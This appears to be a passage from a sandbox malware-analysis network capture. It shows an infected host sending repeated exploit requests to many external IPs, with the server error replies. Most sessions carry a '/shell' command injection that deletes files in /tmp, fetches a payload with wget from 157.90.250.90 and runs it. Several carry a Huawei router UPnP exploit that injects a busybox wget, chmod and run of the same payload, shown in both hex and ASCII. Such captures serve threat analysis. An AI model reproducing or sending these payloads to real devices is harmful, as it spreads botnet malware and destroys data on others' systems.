                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 72 6f 77 69 74 68 79 2e 62 69 74 73 66 61 62 72 69 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at growithy.bitsfabrik.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          41192.168.2.2344810190.167.115.16280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.091589928 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.274028063 CET316INHTTP/1.1 200 OK
                                                          Content-Type:text/html; charset=UTF-8
                                                          Pragma:no-cache
                                                          Cache-control:no-cache, no-store, max-age=0
                                                          Transfer-Encoding:chunked
                                                          X-Frame-Options:SAMEORIGIN
                                                          Connection:Keep-Alive
                                                          X-XSS-Protection:1; mode=block
                                                          Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                          Jan 2, 2024 06:23:55.274523973 CET1286INData Raw: 64 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                          Data Ascii: d39<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                          Jan 2, 2024 06:23:55.274539948 CET1286INData Raw: 2d 31 29 20 3d 3d 20 27 3a 27 29 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 4c 69 73 74 20 3d 20 41 64 64 72 65 73 73 2e 73 70
                                                          Data Ascii: -1) == ':')) { return false; } List = Address.split(":"); if (List.length > 8) { return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressU
                                                          Jan 2, 2024 06:23:55.274992943 CET861INData Raw: 0d 0a 65 6c 73 65 0d 0a 7b 0d 0a 76 61 72 20 4c 69 73 74 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 70 6c 69 74 28 22 3a 22 29 3b 0d 0a 69 66 28 4c 69 73 74 2e 6c 65 6e 67 74 68 20 3e 3d 20 33 29 0d 0a 7b 0d 0a 2f 2a 20 69 6e 63 6c 75 64 65 20 74 77
                                                          Data Ascii: else{var List = HostInfo.split(":");if(List.length >= 3){/* include two or more than two ":" */if(true == IsIPv6AddressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPo


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.2349624104.82.113.6180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.139648914 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.364953995 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 37 30 33 32 62 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 35 26 23 34 36 3b 63 38 33 37 30 66 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;8c7032b8&#46;1704173035&#46;c8370fc</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          43192.168.2.2358400119.77.165.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.158684015 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          44192.168.2.2352912146.75.63.13380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.171236992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.428246021 CET162INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          Content-Length: 11
                                                          content-type: text/plain; charset=utf-8
                                                          x-served-by: cache-fco2270020
                                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          45192.168.2.233415238.181.35.21980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.217292070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.520407915 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          46192.168.2.2348036125.229.151.23980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.241744041 CET511INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 61 61 35 36 65 38 34 65 2d 33 62 63 61 2d 63 37 30 36 2d 62 33 34 35 2d 62 64 36 64 39 31 37 35 66 35 38 39 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30
                                                          Data Ascii: (null) 400 Bad RequestServer: aa56e84e-3bca-c706-b345-bd6d9175f589Date: Tue, 02 Jan 2024 05:12:52 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE><


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          47192.168.2.2347442121.36.115.24980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.420371056 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.749375105 CET209INHTTP/1.1 400 Illegal character SPACE=' '
                                                          Content-Type: text/html;charset=iso-8859-1
                                                          Content-Length: 70
                                                          Connection: close
                                                          Data Raw: 3c 68 31 3e 42 61 64 20 4d 65 73 73 61 67 65 20 34 30 30 3c 2f 68 31 3e 3c 70 72 65 3e 72 65 61 73 6f 6e 3a 20 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 53 50 41 43 45 3d 27 20 27 3c 2f 70 72 65 3e
                                                          Data Ascii: <h1>Bad Message 400</h1><pre>reason: Illegal character SPACE=' '</pre>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.235552023.194.37.21780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.440501928 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.789649963 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 65 37 30 65 37 33 31 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 35 26 23 34 36 3b 31 33 31 38 65 62 62 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ce70e731&#46;1704173035&#46;1318ebbd</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          49192.168.2.23532944.152.153.16480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.535212040 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          50192.168.2.2338386142.58.163.9680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.563204050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          51192.168.2.2358414109.196.234.1880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:55.633320093 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          52192.168.2.2337532156.254.98.9037215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:56.031359911 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:00.144705057 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:06.287846088 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:18.318149090 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
